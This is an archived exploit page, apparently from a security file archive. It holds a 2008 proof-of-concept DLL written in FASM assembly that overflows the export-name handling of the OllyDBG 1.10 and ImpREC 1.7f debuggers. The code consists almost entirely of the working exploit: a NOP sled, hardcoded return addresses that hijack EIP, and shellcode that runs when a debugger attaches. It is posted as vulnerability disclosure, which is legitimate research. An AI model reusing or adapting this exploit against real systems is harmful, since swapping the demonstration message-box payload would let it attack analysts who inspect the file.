ollydbg-overflow.txt

ollydbg-overflow.txt: Posted Jul 10, 2008; Authored by Defsanguje; OllyDBG version 1.10 and ImpREC version 1.7f proof of concept exploit that demonstrates a buffer overflow vulnerability.; tags | exploit, overflow, proof of concept; SHA-256 | e8af1d5c2602759f0e83ebd5bc01798806ce591531148f9fc0b42073f5ff6c1c; Download | Favorite | View

ollydbg-overflow.txt

;-------------------------------------------------------------------------;
; OllyDBG v1.10 and ImpREC v1.7f export name buffer overflow vulnerability
; PoC (probably older versions affected too, not tested though.)         
;
; Included shellcode shows a messagebox (WinXP SP2) and is configured for
; OllyDBG. See lines 60-105 for more details
;-------------------------------------------------------------------------;
; Usage:
; Load this DLL to your process and try to attach OllyDBG or ImpREC
; to it -> Shellcode executed >:)
;
; Shellcode gets fired also if program is run under OllyDBG.
;
; Bug discovered and PoC coded by:
; ~ Defsanguje, Defsanguje [at] gmail [dot] com             [July 7 2008]
;-------------------------------------------------------------------------;
; Coded in FASM
;-------------------------------------------------------------------------;

format PE GUI 4.0 DLL

include 'win32a.inc'
entry DllEntryPoint

section '.code' code readable executable

proc DllEntryPoint, hinstDLL,fdwReason,lpvReserved
                    mov eax, TRUE
                    ret
endp

;-------------------------------------------------------------------------;
; Modified version from original export-macro.
;-------------------------------------------------------------------------;
macro ExportExploit dllname,[label]
 { common
    local module,addresses,names,ordinal,count
    count = 0
   forward
    count = count+1
   common
    dd 0,0,0,RVA module,1
    dd count,count,RVA addresses,RVA names,RVA ordinal
    addresses:
   forward
    dd RVA label
   common
    names:
   forward
    local name
    dd RVA name
   common
    ordinal: count = 0
   forward
    dw count
    count = count+1
   common
    module db dllname,0
   forward
   
;-------------------------------------------------------------------------;
; Exploit for OllyDBG v1.10
;-------------------------------------------------------------------------;
a:  name\
    db 3e0h dup (90h)
    dd 6d553b78h                                                ; ESP to EBP
    dd 6d55e5ffh                                                ; EBP to EAX
    dd 0defdefdeh
    dd 0defdefdeh
    dd 6d56d25eh                                                ; add eax, 40h
    dd 0defdefdeh
    dd 6d52e1efh                                                ; jmp EAX =)
    db 40h-18h dup(90h)
c:  push eax
    mov eax, (ShellCodeStart-c) xor 0defdefdeh
    xor eax, 0defdefdeh
    add eax, [esp]
    jmp eax
b:  db 0bd0h - (ShellCodeEnd-ShellCodeStart) - (b-a) dup (90h)

ShellCodeStart:
    db 81h,0ECh,07Dh,0FFh,0FFh,0FFh
    db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh
    db 8Ah,05h,45h,7Eh                                          ; Address of messagebox in winxp sp2
    db 0FFh,0D3h
ShellCodeEnd:
    dd 0045F823h                                                 ; New EIP

    db 300h dup(90h)
    db 0

;-------------------------------------------------------------------------;
; Exploit for ImpREC v1.7f
;-------------------------------------------------------------------------;
;    name\
;    db 0C0Ch - (ShellCodeEnd-ShellCodeStart) dup (90h)
;ShellCodeStart:
;    db 81h,0ECh,07Dh,0FFh,0FFh,0FFh
;    db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh
;    db 8Ah,05h,45h,7Eh                                          ; Address of messagebox in winxp sp2
;    db 0FFh,0D3h
;ShellCodeEnd:
;    dd 12c1b8h                                                  ; New EIP
;    db 0
;-------------------------------------------------------------------------;
    
   common
    local x,y,z,str1,str2,v1,v2
    x = count shr 1
    while x > 0
     y = x
     while y < count
      z = y
      while z-x >= 0
       load v1 dword from names+z*4
       str1=($-RVA $)+v1
       load v2 dword from names+(z-x)*4
       str2=($-RVA $)+v2
       while v1 > 0
        load v1 from str1+%-1
        load v2 from str2+%-1
        if v1 <> v2
         break
        end if
       end while
       if v1<v2
        load v1 dword from names+z*4
        load v2 dword from names+(z-x)*4
        store dword v1 at names+(z-x)*4
        store dword v2 at names+z*4
        load v1 word from ordinal+z*2
        load v2 word from ordinal+(z-x)*2
        store word v1 at ordinal+(z-x)*2
        store word v2 at ordinal+z*2
       else
        break
       end if
       z = z-x
      end while
      y = y+1
     end while
     x = x shr 1
    end while }

section '.edata' export data readable
;-------------------------------------------------------------------------;
; Call the macro
;-------------------------------------------------------------------------;
  ExportExploit 'exploit.dll',\
        $
        
;-------------------------------------------------------------------------;

Top Authors In Last 30 Days

Red Hat 285 files
Ubuntu 66 files
Debian 23 files
LiquidWorm 10 files
Valentin Lobstein 10 files
nu11secur1ty 7 files
Google Security Research 4 files
Milad Karimi 4 files
Jann Horn 3 files
Lennert Preuth 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,025)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,485)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,706)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,394)
UnixWare (187)
Windows (6,653)
Other

ollydbg-overflow.txt

ollydbg-overflow.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ollydbg-overflow.txt

Share This

ollydbg-overflow.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems